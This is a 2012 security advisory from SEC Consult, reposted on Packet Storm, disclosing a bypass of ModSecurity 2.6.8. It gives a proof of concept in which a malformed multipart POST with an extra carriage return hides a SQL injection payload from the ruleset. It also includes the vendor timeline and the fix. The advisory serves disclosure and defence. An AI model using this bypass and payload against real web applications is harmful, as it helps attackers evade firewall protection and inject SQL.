ModSecurity 2.6.8 Bypass

2012-10-17T00:00:00
ID PACKETSTORM:117456
Type packetstorm
Reporter Bernhard Mueller
Modified 2012-10-17T00:00:00

Description

                                        
                                            `SEC Consult Vulnerability Lab Security Advisory < 20121017-0 >  
=======================================================================  
title: ModSecurity multipart/invalid part ruleset bypass  
product: ModSecurity  
vulnerable version: <= 2.6.8  
fixed version: 2.7.0  
CVE number: -  
impact: Depends what you use it for  
homepage: http://www.modsecurity.org/  
found: 2012-10-12  
by: Bernhard Mueller  
SEC Consult Vulnerability Lab  
https://www.sec-consult.com  
=======================================================================  
  
Vendor/product description:  
---------------------------  
ModSecurity for Apache is a web server plug-in for the Apache web server  
platform. This is the original, most mature and deployed ModSecurity module.  
This module is maintained by the Trustwave SpiderLabs Research Team.  
  
URL: http://www.modsecurity.org/projects/modsecurity/apache/  
  
  
Vulnerability overview/description:  
-----------------------------------  
Validation of POST parameters can be bypassed on Apache/PHP installations by  
sending specially formed multipart requests. A POST parameter's content can be  
hidden from ModSecurity by prepending an invalid part. This first part  
contains only a Content-Disposition header and has an additional carriage  
return inserted at the end of the line ([\r\r\n]). This is followed by a  
boundary in the next line and another Content-Disposition header with a  
filename. The request content looks like this (newlines are all \r\n except in  
line 2).  
  
--A  
Content-Disposition: form-data; name="id"[\r][\r][\n]  
--A  
Content-Disposition: form-data; name="lol"; filename="x"  
  
1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--  
  
--A--  
  
ModSecurity skips what it believes to be an invalid first part and proceeds to  
parse the second part. This part is treated as a file and not checked against  
the ruleset.  
  
PHP however treats the whole thing as a single part and processes only the  
first Content-Disposition header, ignoring the second one. In the opinion of  
PHP this request contains a POST parameter with the name specified in the  
first header.  
  
  
Proof of concept:  
-----------------  
  
wut.php:  
--------  
  
<? echo $POST[xxx] ?>  
  
  
POST request:  
-------------  
  
POST /wut.php HTTP/1.1  
Content-Type: multipart/form-data; boundary=A  
Content-Length: 161  
  
--A  
Content-Disposition: form-data; name="xxx"[\r][\r][\n]  
--A  
Content-Disposition: form-data; name="yyy"; filename="z"  
  
1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--  
  
--A--  
  
  
Output:  
-------  
  
1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--  
  
(any change in the header should produce a 403)  
  
  
Vulnerable / tested versions:  
-----------------------------  
  
This works with ModSecurity up to version 2.6.8.  
  
  
Vendor contact timeline:  
------------------------  
2012-10-11: Contacted ModSecurity  
2012-10-15: ModSecurity guys fixed it  
2012-10-16: New ModSecurity release 2.7.0  
2012-10-17: Public release of advisory  
  
  
Solution:  
---------  
To mitigate this bypass method, upgrade to ModSecurity 2.7.0 and make sure  
that the MULTIPART_INVALID_PART flag is set in the multipart strict validation  
rule. Add the line:  
  
IQ %{MULTIPART_INVALID_PART}, \  
  
to the SecRule MULTIPART_STRICT_ERROR in your ModSecurity configuration file.  
  
Download is available at:  
  
http://www.modsecurity.org/download/  
  
  
  
Advisory URL:  
--------------  
https://www.sec-consult.com/en/advisories.html  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
The SEC Consult Group  
  
Office Vienna  
Mooslackengasse 17  
A-1190 Vienna  
Austria  
Tel.: +43 / 1 / 890 30 43 - 0  
Fax.: +43 / 1 / 890 30 43 - 25  
Mail: research at sec-consult dot com  
www.sec-consult.com  
  
  
Office Singapore  
4 Battery Road  
#25-01 Bank of China Building  
Singapore (049908)  
Mail: office at sec-consult dot sg  
  
  
Check out our blog at:  
http://blog.sec-consult.com/  
  
  
And this thing here:  
http://wordpress.org/extend/plugins/mvis-security-center/  
  
  
EOF B. Mueller / October 2012  
`